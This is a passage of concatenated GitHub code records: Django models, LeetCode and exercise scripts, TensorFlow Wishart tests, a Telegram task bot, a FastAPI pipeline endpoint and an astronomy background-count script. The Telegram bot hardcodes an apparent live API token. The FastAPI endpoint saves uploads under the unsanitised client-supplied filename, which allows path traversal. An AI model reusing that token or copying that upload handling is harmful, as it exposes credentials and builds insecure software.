auto_now_add=True)\r\n gender_options = (\r\n ('Male', 'Male'),\r\n ('Female', 'Female'),\r\n ('Other', 'Other'),\r\n )\r\n\r\n gender = models.CharField(\r\n verbose_name='Choose Gender', choices=gender_options, max_length=20)\r\n\r\n is_staff = models.BooleanField(verbose_name='Staff Status', default=False, help_text='Designate if the user has '\r\n 'staff status')\r\n is_active = models.BooleanField(verbose_name='Active Status', default=True, help_text='Designate if the user has '\r\n 'active status')\r\n is_superuser = models.BooleanField(verbose_name='Superuser Status', default=False, help_text='Designate if the '\r\n 'user has superuser '\r\n 'status')\r\n is_sales_head = models.BooleanField(verbose_name='Sales Head Status', default=False, help_text='Designate if the '\r\n 'user is sales head ')\r\n is_sales = models.BooleanField(verbose_name='Sales Status', default=False, help_text='Designate if the '\r\n 'user is sales')\r\n is_blogger = models.BooleanField(verbose_name='Blog Admin Status', default=False, help_text='Designate if the '\r\n 'user is Blog Admin ')\r\n is_bcs_head = models.BooleanField(verbose_name='BCS Admin Status', default=False, help_text='Designate if the '\r\n 'user is BCS Admin')\r\n is_pcs_head = models.BooleanField(verbose_name='PCS Admin Status', default=False, help_text='Designate if the '\r\n 'user is PCS Admin')\r\n is_bcs = models.BooleanField(verbose_name='Business Status', default=False, help_text='Designate if the user is '\r\n 'associated with a business')\r\n newsletter = models.BooleanField(verbose_name='Newsletter', default=False, help_text='Receive Email About Update '\r\n 'and Notifications')\r\n\r\n USERNAME_FIELD = 'email'\r\n REQUIRED_FIELDS = ['full_name', ]\r\n\r\n objects = UserManager()\r\n\r\n def __str__(self):\r\n return self.full_name\r\n\r\n def address(self):\r\n return f'{self.address_one} {self.address_two}, {self.city}, {self.zipcode}, {self.country}'\r\n\r\n\r\nadmin_choices = (\r\n ('main_admin', 'Main Admin'),\r\n ('bcs_admin', 'BCS Admin'),\r\n ('pcs_admin', 'PCS Admin'),\r\n ('academy_admin', 'Academy Admin'),\r\n ('blog_admin', 'Blog Admin'),\r\n)\r\n\r\n\r\nclass 
Permissions(models.Model):\r\n    user = models.OneToOneField(\r\n        User, on_delete=models.CASCADE, related_name='permission_user')\r\n    admin_type = models.CharField(choices=admin_choices, max_length=264)\r\n    is_superadmin = models.BooleanField(\r\n        default=False, verbose_name='Super Admin')\r\n    is_admin = models.BooleanField(default=False, verbose_name='Admin')\r\n    is_moderator = models.BooleanField(default=False, verbose_name='Moderator')\r\n    is_editor = models.BooleanField(default=False, verbose_name='Editor')\r\n\r\n    def __str__(self):\r\n        return f'{self.user} - {self.admin_type}'\r\n\r\n\r\nclass Interest(models.Model):\r\n    user = models.OneToOneField(\r\n        User, on_delete=models.CASCADE, related_name='interest_user')\r\n    risk_assessment = models.BooleanField(default=True)\r\n    incident_response = models.BooleanField(default=True)\r\n    cyber_crime_investigation = models.BooleanField(default=True)\r\n    open_source_intelligence = models.BooleanField(default=True)\r\n    hack_recovery = models.BooleanField(default=True)\r\n    virus_removal = models.BooleanField(default=True)\r\n    digital_forensic = models.BooleanField(default=True)\r\n    digital_integration = models.BooleanField(default=True)\r\n\r\n    def __str__(self):\r\n        return f'{self.user}s interest'\r\n\r\n\r\n@receiver(post_save, sender=User)\r\ndef create_interest(sender, instance, created, **kwargs):\r\n    if created:\r\n        Interest.objects.create(user=instance)\r\n\r\n\r\n@receiver(post_save, sender=User)\r\ndef save_interest(sender, instance, **kwargs):\r\n    instance.interest_user.save()\r\n\r\n# @receiver(post_save, sender=User)\r\n# def create_permission(sender, instance, created, **kwargs):\r\n#     if created:\r\n#         Permissions.objects.create(user=instance)\r\n#\r\n#\r\n# @receiver(post_save, sender=User)\r\n# def save_permission(sender, instance, **kwargs):\r\n#     instance.permission_user.save()\r\n","repo_name":"MahmudJewel/tech-foring-task","sub_path":"Account/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7299,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"33091614294","text":"print('='*8,'Age of Majority Group','='*8)\n\nfrom datetime import date\nmenor = 0\nmaior = 0\nfor p in range(1, 8):\n    dt = int(input('Year of birth of person number {}: '.format(p)))\n    idade = date.today().year - dt\n    if idade < 18:\n        menor += 1\n    else:\n        maior += 1\nprint('There are {} people under legal age and {} people of legal age.'.format(menor, maior))\n","repo_name":"Samuel-Melo890/Python-Desafios","sub_path":"ExerciciosPYTHON/PythonCeV/054.py","file_name":"054.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"27341247018","text":"## Solution 1 - Brute force\n## Time: O(N^2)\n## The complete set of N intervals is scanned for every (N) interval chosen.\n\n\n## Solution 2 - Sorting + Linear scan\n## Time: O(N^2)\n\n\n## Solution 3 - Sorting + Binary search\n## Time Complexity: O(NlogN)\n## Space Complexity: O(N)\nclass Solution:\n    def binarySearch(self, end, arr, left, right):\n        while left < right:\n            mid = left + (right - left) // 2\n            if arr[mid][1][0] == end:\n                return mid\n            elif arr[mid][1][0] > end:\n                right = mid\n            else:\n                left = mid + 1\n        return left\n\n    def findRightInterval(self, intervals):\n        '''\n        :type intervals: List[List[int]]\n        :rtype: List[int]\n        '''\n        dic = {i:interval for i, interval in enumerate(intervals)}\n        dic = sorted(dic.items(), key = lambda x: 
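The paired `create_interest`/`save_interest` receivers above are the usual Django idiom for keeping a one-to-one row in sync with `User`. The same effect can come from a single receiver; a sketch of that pattern (the `Profile` model and the `'auth.User'` lazy sender are illustrative stand-ins, and this assumes a configured Django project):

```python
from django.db import models
from django.db.models.signals import post_save
from django.dispatch import receiver

class Profile(models.Model):
    # Illustrative stand-in for the Interest/Permissions models above.
    user = models.OneToOneField('auth.User', on_delete=models.CASCADE,
                                related_name='profile')

@receiver(post_save, sender='auth.User')
def ensure_profile(sender, instance, created, **kwargs):
    # One receiver covers both the create and the update case,
    # replacing the create_*/save_* pair.
    if created:
        Profile.objects.create(user=instance)
    else:
        instance.profile.save()
```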
x[1][0])\n res = [float('-inf')] * len(intervals)\n\n for i, item in enumerate(dic):\n idx, interval = item[0], item[1]\n ans = self.binarySearch(interval[1], dic, i+1, len(dic))\n if ans == len(dic):\n res[idx] = -1\n else:\n res[idx] = dic[ans][0]\n return res\n\n\n## Solution 4 - Two heaps\n## Time Complexity: O(NlogN)\n## Space Complexity: O(N)\nclass Solution:\n def findRightInterval(self, intervals):\n '''\n :type intervals: List[List[int]]\n :rtype: List[int]\n '''\n result = [-1] * len(intervals)\n max_start_heap, max_end_heap = [], []\n for i in range(len(intervals)):\n heappush(max_start_heap, (-intervals[i][0], i))\n heappush(max_end_heap, (-intervals[i][1], i))\n\n # go through all the intervals to find each interval's next interval\n for _ in range(len(intervals)):\n top_end, i = heappop(max_end_heap)\n if max_start_heap and -max_start_heap[0][0] >= -top_end:\n curr_start, curr_start_i = heappop(max_start_heap)\n # keep finding the interval that has the closest start\n while max_start_heap and -max_start_heap[0][0] >= -top_end:\n curr_start, curr_start_i = heappop(max_start_heap)\n result[i] = curr_start_i\n # put the interval back as it could be the next interval of other intervals\n heappush(max_start_heap, (curr_start, curr_start_i))\n return result\n","repo_name":"Shirleyxxy/lc-python-algorithms","sub_path":"medium/find-right-interval.py","file_name":"find-right-interval.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"1904555908","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nfrom scipy import linalg\nimport tensorflow as tf\n\ndistributions = tf.contrib.distributions\n\n\ndef make_pd(start, n):\n \"\"\"Deterministically create a positive definite matrix.\"\"\"\n x = np.tril(linalg.circulant(np.arange(start, start + n)))\n return np.dot(x, x.T)\n\n\ndef chol(x):\n \"\"\"Compute Cholesky factorization.\"\"\"\n return linalg.cholesky(x).T\n\n\ndef wishart_var(df, x):\n \"\"\"Compute Wishart variance for numpy scale matrix.\"\"\"\n x = np.sqrt(df) * np.asarray(x)\n d = np.expand_dims(np.diag(x), -1)\n return x**2 + np.dot(d, d.T)\n\n\nclass WishartCholeskyTest(tf.test.TestCase):\n\n def testEntropy(self):\n with self.test_session():\n scale = make_pd(1., 2)\n df = 4\n w = distributions.WishartCholesky(df, chol(scale))\n # sp.stats.wishart(df=4, scale=make_pd(1., 2)).entropy()\n self.assertAllClose(6.301387092430769, w.entropy().eval())\n\n w = distributions.WishartCholesky(df=1, scale=[[1.]])\n # sp.stats.wishart(df=1,scale=1).entropy()\n self.assertAllClose(0.78375711047393404, w.entropy().eval())\n\n def testMeanLogDetAndLogNormalizingConstant(self):\n with self.test_session():\n def entropy_alt(w):\n return (w.log_normalizing_constant() -\n 0.5 * (w.df - w.dimension - 1.) 
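Both `findRightInterval` variants above implement LeetCode 436; note that the two-heap version relies on `heappush`/`heappop`, which need to be imported. A quick sanity check against the problem's published example (the expected answer is `[-1, 0, 1]`):

```python
from heapq import heappush, heappop  # required by the two-heap Solution above

intervals = [[3, 4], [2, 3], [1, 2]]
# [3,4] has no interval starting at >= 4, so -1;
# [2,3] -> [3,4] at index 0; [1,2] -> [2,3] at index 1.
print(Solution().findRightInterval(intervals))  # [-1, 0, 1]
```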
* w.mean_log_det() +\n 0.5 * w.df * w.dimension).eval()\n\n w = distributions.WishartCholesky(df=4, scale=chol(make_pd(1., 2)))\n self.assertAllClose(w.entropy().eval(), entropy_alt(w))\n\n w = distributions.WishartCholesky(df=5, scale=[[1.]])\n self.assertAllClose(w.entropy().eval(), entropy_alt(w))\n\n def testMean(self):\n with self.test_session():\n scale = make_pd(1., 2)\n df = 4\n w = distributions.WishartCholesky(df, chol(scale))\n self.assertAllEqual(df * scale, w.mean().eval())\n\n def testMode(self):\n with self.test_session():\n scale = make_pd(1., 2)\n df = 4\n w = distributions.WishartCholesky(df, chol(scale))\n self.assertAllEqual((df - 2. - 1.) * scale, w.mode().eval())\n\n def testStd(self):\n with self.test_session():\n scale = make_pd(1., 2)\n df = 4\n w = distributions.WishartCholesky(df, chol(scale))\n self.assertAllEqual(chol(wishart_var(df, scale)), w.std().eval())\n\n def testVariance(self):\n with self.test_session():\n scale = make_pd(1., 2)\n df = 4\n w = distributions.WishartCholesky(df, chol(scale))\n self.assertAllEqual(wishart_var(df, scale), w.variance().eval())\n\n def testSample(self):\n with self.test_session():\n scale = make_pd(1., 2)\n df = 4\n\n chol_w = distributions.WishartCholesky(\n df, chol(scale), cholesky_input_output_matrices=False)\n\n x = chol_w.sample_n(1, seed=42).eval()\n chol_x = [chol(x[0])]\n\n full_w = distributions.WishartFull(\n df, scale, cholesky_input_output_matrices=False)\n self.assertAllClose(x, full_w.sample_n(1, seed=42).eval())\n\n chol_w_chol = distributions.WishartCholesky(\n df, chol(scale), cholesky_input_output_matrices=True)\n self.assertAllClose(chol_x, chol_w_chol.sample_n(1, seed=42).eval())\n eigen_values = tf.matrix_diag_part(chol_w_chol.sample_n(1000, seed=42))\n np.testing.assert_array_less(0., eigen_values.eval())\n\n full_w_chol = distributions.WishartFull(\n df, scale, cholesky_input_output_matrices=True)\n self.assertAllClose(chol_x, full_w_chol.sample_n(1, seed=42).eval())\n eigen_values = tf.matrix_diag_part(full_w_chol.sample_n(1000, seed=42))\n np.testing.assert_array_less(0., eigen_values.eval())\n\n # Check first and second moments.\n df = 4.\n chol_w = distributions.WishartCholesky(\n df=df,\n scale=chol(make_pd(1., 3)),\n cholesky_input_output_matrices=False)\n x = chol_w.sample_n(10000, seed=42)\n self.assertAllEqual((10000, 3, 3), x.get_shape())\n\n moment1_estimate = tf.reduce_mean(x, reduction_indices=[0]).eval()\n self.assertAllClose(chol_w.mean().eval(),\n moment1_estimate,\n rtol=0.05)\n\n # The Variance estimate uses the squares rather than outer-products\n # because Wishart.Variance is the diagonal of the Wishart covariance\n # matrix.\n variance_estimate = (\n tf.reduce_mean(tf.square(x), reduction_indices=[0]) -\n tf.square(moment1_estimate)).eval()\n self.assertAllClose(chol_w.variance().eval(),\n variance_estimate,\n rtol=0.05)\n\n def testProb(self):\n with self.test_session():\n # Generate some positive definite (pd) matrices and their Cholesky\n # factorizations.\n x = np.array([\n make_pd(1., 2),\n make_pd(2., 2),\n make_pd(3., 2),\n make_pd(4., 2)])\n chol_x = np.array([\n chol(x[0]),\n chol(x[1]),\n chol(x[2]),\n chol(x[3])])\n\n # Since Wishart wasn\"t added to SciPy until 0.16, we'll spot check some\n # pdfs with hard-coded results from upstream SciPy.\n\n log_prob_df_seq = np.array([\n # math.log(stats.wishart.pdf(x[0], df=2+0, scale=x[0]))\n -3.5310242469692907,\n # math.log(stats.wishart.pdf(x[1], df=2+1, scale=x[1]))\n -7.689907330328961,\n # math.log(stats.wishart.pdf(x[2], 
df=2+2, scale=x[2]))\n -10.815845159537895,\n # math.log(stats.wishart.pdf(x[3], df=2+3, scale=x[3]))\n -13.640549882916691,\n ])\n\n # This test checks that batches don't interfere with correctness.\n w = distributions.WishartCholesky(\n df=[2, 3, 4, 5],\n scale=chol_x,\n cholesky_input_output_matrices=True)\n self.assertAllClose(log_prob_df_seq, w.log_pdf(chol_x).eval())\n\n # Now we test various constructions of Wishart with different sample\n # shape.\n\n log_prob = np.array([\n # math.log(stats.wishart.pdf(x[0], df=4, scale=x[0]))\n -4.224171427529236,\n # math.log(stats.wishart.pdf(x[1], df=4, scale=x[0]))\n -6.3378770664093453,\n # math.log(stats.wishart.pdf(x[2], df=4, scale=x[0]))\n -12.026946850193017,\n # math.log(stats.wishart.pdf(x[3], df=4, scale=x[0]))\n -20.951582705289454,\n ])\n\n for w in (\n distributions.WishartCholesky(\n df=4, scale=chol_x[0], cholesky_input_output_matrices=False),\n distributions.WishartFull(\n df=4, scale=x[0], cholesky_input_output_matrices=False)):\n self.assertAllEqual((2, 2), w.event_shape().eval())\n self.assertEqual(2, w.dimension.eval())\n self.assertAllClose(log_prob[0], w.log_prob(x[0]).eval())\n self.assertAllClose(log_prob[0:2], w.log_prob(x[0:2]).eval())\n self.assertAllClose(\n np.reshape(log_prob, (2, 2)),\n w.log_prob(np.reshape(x, (2, 2, 2, 2))).eval())\n self.assertAllClose(\n np.reshape(np.exp(log_prob), (2, 2)),\n w.prob(np.reshape(x, (2, 2, 2, 2))).eval())\n self.assertAllEqual(\n (2, 2),\n w.log_prob(np.reshape(x, (2, 2, 2, 2))).get_shape())\n\n for w in (\n distributions.WishartCholesky(\n df=4, scale=chol_x[0], cholesky_input_output_matrices=True),\n distributions.WishartFull(\n df=4, scale=x[0], cholesky_input_output_matrices=True)):\n self.assertAllEqual((2, 2), w.event_shape().eval())\n self.assertEqual(2, w.dimension.eval())\n self.assertAllClose(log_prob[0], w.log_prob(chol_x[0]).eval())\n self.assertAllClose(log_prob[0:2], w.log_prob(chol_x[0:2]).eval())\n self.assertAllClose(\n np.reshape(log_prob, (2, 2)),\n w.log_prob(np.reshape(chol_x, (2, 2, 2, 2))).eval())\n self.assertAllClose(\n np.reshape(np.exp(log_prob), (2, 2)),\n w.prob(np.reshape(chol_x, (2, 2, 2, 2))).eval())\n self.assertAllEqual(\n (2, 2),\n w.log_prob(np.reshape(x, (2, 2, 2, 2))).get_shape())\n\n def testBatchShape(self):\n with self.test_session() as sess:\n scale = make_pd(1., 2)\n chol_scale = chol(scale)\n\n w = distributions.WishartCholesky(df=4, scale=chol_scale)\n self.assertAllEqual([], w.get_batch_shape())\n self.assertAllEqual([], w.batch_shape().eval())\n\n w = distributions.WishartCholesky(\n df=[4., 4], scale=np.array([chol_scale, chol_scale]))\n self.assertAllEqual([2], w.get_batch_shape())\n self.assertAllEqual([2], w.batch_shape().eval())\n\n scale_deferred = tf.placeholder(tf.float32)\n w = distributions.WishartCholesky(df=4, scale=scale_deferred)\n self.assertAllEqual(\n [], sess.run(w.batch_shape(), feed_dict={scale_deferred: chol_scale}))\n self.assertAllEqual(\n [2], sess.run(w.batch_shape(),\n feed_dict={scale_deferred: [chol_scale, chol_scale]}))\n\n def testEventShape(self):\n with self.test_session() as sess:\n scale = make_pd(1., 2)\n chol_scale = chol(scale)\n\n w = distributions.WishartCholesky(df=4, scale=chol_scale)\n self.assertAllEqual([2, 2], w.get_event_shape())\n self.assertAllEqual([2, 2], w.event_shape().eval())\n\n w = distributions.WishartCholesky(\n df=[4., 4], scale=np.array([chol_scale, chol_scale]))\n self.assertAllEqual([2, 2], w.get_event_shape())\n self.assertAllEqual([2, 2], w.event_shape().eval())\n\n 
scale_deferred = tf.placeholder(tf.float32)\n      w = distributions.WishartCholesky(df=4, scale=scale_deferred)\n      self.assertAllEqual(\n          [2, 2], sess.run(w.event_shape(),\n                           feed_dict={scale_deferred: chol_scale}))\n      self.assertAllEqual(\n          [2, 2],\n          sess.run(w.event_shape(),\n                   feed_dict={scale_deferred: [chol_scale, chol_scale]}))\n\n  def testValidateArgs(self):\n    with self.test_session() as sess:\n      df_deferred = tf.placeholder(tf.float32)\n      chol_scale_deferred = tf.placeholder(tf.float32)\n      x = make_pd(1., 3)\n      chol_scale = chol(x)\n\n      # Check expensive, deferred assertions.\n      with self.assertRaisesRegexp(tf.errors.InvalidArgumentError,\n                                   \"cannot be less than\"):\n        chol_w = distributions.WishartCholesky(df=df_deferred,\n                                               scale=chol_scale_deferred,\n                                               validate_args=True)\n        sess.run(chol_w.log_prob(np.asarray(x, dtype=np.float32)),\n                 feed_dict={df_deferred: 2., chol_scale_deferred: chol_scale})\n\n      with self.assertRaisesRegexp(tf.errors.InvalidArgumentError,\n                                   \"LLT decomposition was not successful\"):\n        chol_w = distributions.WishartFull(df=df_deferred,\n                                           scale=chol_scale_deferred)\n        # np.ones((3, 3)) is not positive definite.\n        sess.run(chol_w.log_prob(np.asarray(x, dtype=np.float32)),\n                 feed_dict={\n                     df_deferred: 4.,\n                     chol_scale_deferred: np.ones((3, 3), dtype=np.float32)})\n\n      # Ensure no assertions.\n      chol_w = distributions.WishartCholesky(df=df_deferred,\n                                             scale=chol_scale_deferred,\n                                             validate_args=False)\n      sess.run(chol_w.log_prob(np.asarray(x, dtype=np.float32)),\n               feed_dict={df_deferred: 4, chol_scale_deferred: chol_scale})\n      # Bogus log_prob, but since we have no checks running... c'est la vie.\n      sess.run(chol_w.log_prob(np.asarray(x, dtype=np.float32)),\n               feed_dict={df_deferred: 4, chol_scale_deferred: np.ones((3, 3))})\n\n      # Still has these assertions because they're resolvable at graph\n      # construction\n      with self.assertRaisesRegexp(ValueError, \"cannot be less than\"):\n        chol_w = distributions.WishartCholesky(\n            df=2, scale=chol_scale,\n            validate_args=False)\n      with self.assertRaisesRegexp(TypeError, \"not a floating-point type\"):\n        chol_w = distributions.WishartCholesky(\n            df=4., scale=np.asarray(chol_scale, dtype=np.int32),\n            validate_args=False)\n\n\nif __name__ == \"__main__\":\n  tf.test.main()\n","repo_name":"hughperkins/tf-coriander","sub_path":"tensorflow/contrib/distributions/python/kernel_tests/wishart_test.py","file_name":"wishart_test.py","file_ext":"py","file_size_in_byte":12372,"program_lang":"python","lang":"en","doc_type":"code","stars":789,"dataset":"github-code","pt":"43"} +{"seq_id":"9172064436","text":"import sqlite3\nfrom django.core.management.base import BaseCommand\nimport telebot\nfrom tasks.models import Task\n\n\nbot = telebot.TeleBot(\"6320700758:AAFxoLeyKsL8e-wE1-yHrZ-pMqbXYJ0VJNI\")\n\n\n\n\n@bot.message_handler(commands=['start'])\ndef start(message):\n    bot.send_message(message.chat.id, \"Hello world!\")\n\n\n@bot.message_handler(commands=['tasks'])\ndef tasks(message):\n    tasks = Task.objects.all()\n    for task in tasks:\n        bot.send_message(message.chat.id, \"Name: \" + task.name + \" Importance: \" + str(task.importance))\n\n@bot.message_handler(commands=['help'])\ndef help(message):\n    bot.send_message(message.chat.id, \"Command list:\\n/start - Start\\n/tasks - Task list\\n/help - Command list\")\n\n@bot.message_handler(commands=['add'])\ndef add(message):\n    # Get the command arguments\n    text = message.text[len('/add '):].strip()\n    args = text.split()\n\n    # Check that enough arguments were passed\n    if len(args) != 2:\n        
bot.send_message(message.chat.id, 'Here is a template for how to use /add:\\n /add <name> <importance (1 to 4)>')\n        return\n\n    task_name = args[0]\n    try:\n        importance = int(args[1])\n    except ValueError:\n        bot.send_message(message.chat.id, 'Error: importance must be a number from 1 to 4')\n        return\n\n    # Validate the importance value\n    if importance < 1 or importance > 4:\n        bot.send_message(message.chat.id, 'Error: importance must be a number from 1 to 4')\n        return\n\n    new_task = Task.objects.create(name=task_name, importance=importance)\n\n    bot.send_message(message.chat.id, f'Task \"{task_name}\" added with importance {importance}')\n\n\nclass Command(BaseCommand):\n    def handle(self, *args, **options):\n        print(\"Starting bot...\")\n        bot.polling()\n        print(\"Bot stopped\")\n\n\n@bot.message_handler(func=lambda message: True)\ndef echo_all(message):\n    bot.reply_to(message, message.text)","repo_name":"TimurShagiev/TaskBot","sub_path":"pythonProject2/TaskProject/tasks/management/commands/run_telegram_bot.py","file_name":"run_telegram_bot.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"33212659029","text":"import sys\nsys.path.append(\"../..\")\nfrom machine import I2C,Pin\nimport lib.am2320\n\nclass AM2320:\n    def __init__(self, i2cNum=0, scl=17, sda=16, freq=100000):\n        self.i2c = I2C(i2cNum,scl=Pin(scl),sda=Pin(sda),freq=freq)\n        self.sensor = lib.am2320.AM2320(self.i2c)\n    \n    # Return the sensor reading data; return None if nothing was read\n    def getMeasureData(self):\n        data = {}\n        if self.sensor.measure() != False:\n            temp = self.sensor.temperature()\n            hum = self.sensor.humidity()\n            data['temp'] = float(f\"{temp:.1f}\")\n            data['hum'] = float(f\"{hum:.1f}\")\n            return data\n        return None\n","repo_name":"cmsg-iot/nttu-ta-develop","sub_path":"Raspberry-Pi-Pico/projects/gas-detected-system/micropython/model/modules/AM2320.py","file_name":"AM2320.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"36689067084","text":"import tensorflow as tf\nimport os\n\n# Declare two variables and compute their sum.\nv1 = tf.Variable(tf.constant(1.0, shape=[1]), name=\"v1\")\nv2 = tf.Variable(tf.constant(2.0, shape=[1]), name=\"v2\")\nresult = v1+v2\n\ninit_op = tf.global_variables_initializer()\n# Declare a tf.train.Saver instance for saving the model\nsaver = tf.train.Saver()\n\n\nwith tf.Session() as sess:\n    sess.run(init_op)\n    # Save the model to the /model/model.ckpt file.\n    saver.save(sess,os.path.dirname(os.getcwd()) + \"\\\\model\\\\model.ckpt\")","repo_name":"jijiwawa/graduation-project-","sub_path":"learn_tensorflow/test5.4.1.py","file_name":"test5.4.1.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"9972785887","text":"from fastapi import FastAPI, File, UploadFile\nfrom yaml import safe_dump, safe_load\nfrom core.utils import checkdir\nfrom core.pipeline import Pipeline\nfrom pandas import DataFrame\nfrom os import environ\n\napp = FastAPI()\n\n\n@app.post('/run')\nasync def run(db_url: str, file: UploadFile = File(...)):\n    folder = 'config'\n    environ['DB_URL'] = db_url\n    checkdir(folder)\n    with open(f'{folder}/{file.filename}', 'w') as f:\n        safe_dump(safe_load(await file.read()), f)\n    p = Pipeline(f'{folder}/{file.filename}')\n    df = p.run()\n    if isinstance(df, DataFrame):\n        df.fillna(0, inplace=True)\n        df = df.to_dict(\"records\")\n    return {\"message\": 
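The TF1 snippet above only saves the checkpoint; the matching restore step rebuilds the same graph and calls `Saver.restore` instead of running the init op. A sketch using the same TF 1.x API (the checkpoint path is illustrative):

```python
import tensorflow as tf

v1 = tf.Variable(tf.constant(1.0, shape=[1]), name="v1")
v2 = tf.Variable(tf.constant(2.0, shape=[1]), name="v2")
result = v1 + v2

saver = tf.train.Saver()
with tf.Session() as sess:
    # Variables come from the checkpoint, so no initializer is run.
    saver.restore(sess, "model/model.ckpt")
    print(sess.run(result))  # [3.]
```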
df}\n","repo_name":"shrinivdeshmukh/synapse-sparks","sub_path":"api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"35172474641","text":"import sys, os\nfrom random import random\nimport numpy as np\nimport astropy.units as u\nfrom astropy.coordinates import SkyCoord, match_coordinates_sky\nfrom astropy.cosmology import WMAP9\nfrom astropy.stats import bootstrap\nfrom astropy.table import Table\nfrom mpi4py import MPI\n\n\ndef check_edge(ra_rand, dec_rand):\n\n cat_random_cut = cat_random_copy[abs(cat_random_copy['RA'] - ra_rand) < 0.7 / dis / np.pi * 180]\n cat_random_cut = cat_random_cut[abs(cat_random_cut['DEC'] - dec_rand) < 0.7 / dis / np.pi * 180]\n\n try:\n ra_ratio = len(cat_random_cut[cat_random_cut['RA']ra_rand])\n dec_ratio = len(cat_random_cut[cat_random_cut['DEC']dec_rand])\n except (ValueError, ZeroDivisionError):\n return True\n\n if ra_ratio > 1/0.75 or ra_ratio < 0.75:\n return True\n elif dec_ratio > 1/0.75 or dec_ratio < 0.75:\n return True\n else:\n return False\n\n\ndef bkg(cat_neighbors_z_slice_rand, coord_massive_gal_rand, mass_cen):\n\n cat_neighbors_z_slice_rand = cat_neighbors_z_slice_rand[cat_neighbors_z_slice_rand['MASS_MED'] > masscut_low]\n cat_neighbors_z_slice_rand = cat_neighbors_z_slice_rand[cat_neighbors_z_slice_rand['MASS_MED'] < masscut_high]\n\n global z\n counts_gals_rand = np.zeros(bin_number)\n n = 0\n num_before_success = 0\n flag_bkg = 0\n\n coord_rand_list = []\n while n < 1: # get several blank pointing's to estimate background\n id_rand = int(random() * len(cat_random))\n ra_rand = cat_random[id_rand]['RA']\n dec_rand = cat_random[id_rand]['DEC']\n idx, sep2d, dist3d = match_coordinates_sky(SkyCoord(ra_rand, dec_rand, unit=\"deg\"), coord_massive_gal_rand, nthneighbor=1)\n\n num_before_success += 1\n if num_before_success > 20:\n flag_bkg = 1\n break\n\n if sep2d.degree > r_iso*2/dis/np.pi*180: # make sure the random pointing is away from any central galaxy (blank)\n if check_edge(ra_rand, dec_rand):\n continue\n\n coord_rand = SkyCoord(ra_rand * u.deg, dec_rand * u.deg)\n coord_rand_list.append(coord_rand)\n cat_neighbors_rand = cat_neighbors_z_slice_rand[abs(cat_neighbors_z_slice_rand['RA'] - ra_rand) < r_iso/dis/np.pi*180]\n cat_neighbors_rand = cat_neighbors_rand[abs(cat_neighbors_rand['DEC'] - dec_rand) < r_iso/dis/np.pi*180]\n coord_neighbors_rand = SkyCoord(cat_neighbors_rand['RA'] * u.deg, cat_neighbors_rand['DEC'] * u.deg)\n\n # exclude bkg apertures that contains galaxies more massive than central\n if len(cat_neighbors_rand) != 0:\n if max(cat_neighbors_rand['MASS_MED']) > mass_cen:\n continue\n elif len(cat_neighbors_rand) < 100:\n continue\n\n # choose radial range\n cat_neighbors_rand = cat_neighbors_rand[np.logical_and(coord_neighbors_rand.separation(coord_rand).degree < r_high/dis/np.pi*180,\n coord_neighbors_rand.separation(coord_rand).degree > r_low / dis / np.pi*180)]\n\n mass_neighbors_rand = cat_neighbors_rand['MASS_MED']\n if len(mass_neighbors_rand) != 0:\n if ssfq == 'all':\n sfq_weights_rand = np.ones(len(mass_neighbors_rand))\n elif ssfq == 'ssf':\n sfq_weights_rand = cat_neighbors_rand['sfProb_nuvrk']\n else:\n sfq_weights_rand = 1 - cat_neighbors_rand['sfProb_nuvrk']\n\n weights = np.array(sfq_weights_rand / completeness_est(mass_neighbors_rand, cat_neighbors_rand['sfProb_nuvrk'], z))\n if not rel_scale:\n counts_gals_rand = np.histogram(mass_neighbors_rand, weights=weights, 
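The `/run` endpoint above takes `db_url` as a query parameter and the YAML config as a multipart upload; a hypothetical client call (the URL, credentials and `pipeline.yaml` file are placeholders, not from the record):

```python
import requests

with open('pipeline.yaml', 'rb') as f:
    resp = requests.post(
        'http://localhost:8000/run',
        params={'db_url': 'postgresql://user:pass@localhost/db'},
        files={'file': ('pipeline.yaml', f, 'application/x-yaml')},
    )
print(resp.json())  # {"message": ...}
```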
bins=bin_edges)[0]\n else:\n rel_mass_neighbors_rand = mass_neighbors_rand - mass_cen\n counts_gals_rand = np.histogram(rel_mass_neighbors_rand, weights=weights, bins=rel_bin_edges)[0]\n\n else:\n counts_gals_rand += np.zeros(bin_number)\n\n n = n + 1\n\n return coord_rand_list, counts_gals_rand, flag_bkg\n\n\ndef bkg_2(cat_neighbors_z_slice_rand, coord_massive_gal_rand, mass_cen):\n counts_gals_rand = np.zeros(bin_number)\n flag_bkg2 = 0\n\n cat_neighbors_rand = cat_neighbors_z_slice_rand[abs(cat_neighbors_z_slice_rand['RA'] - coord_massive_gal_rand.ra) < 1 / dis / np.pi * 180]\n cat_neighbors_rand = cat_neighbors_rand[abs(cat_neighbors_rand['DEC'] - coord_massive_gal_rand.dec) < 1 / dis / np.pi * 180]\n coord_neighbors_rand = SkyCoord(cat_neighbors_rand['RA'] * u.deg, cat_neighbors_rand['DEC'] * u.deg)\n\n # exclude bkg apertures that contains galaxies more massive than central\n # if len(cat_neighbors_rand) != 0:\n # if max(cat_neighbors_rand['MASS_MED']) > mass_cen:\n # return 0,0,0\n\n # choose radial range\n cat_neighbors_rand = cat_neighbors_rand[\n np.logical_and(coord_neighbors_rand.separation(coord_massive_gal_rand).degree < (r_high + 0.1) / dis / np.pi * 180,\n coord_neighbors_rand.separation(coord_massive_gal_rand).degree > r_high / dis / np.pi * 180)]\n\n # make some cuts\n cat_neighbors_rand = cat_neighbors_rand[cat_neighbors_rand['MASS_MED'] > masscut_low]\n cat_neighbors_rand = 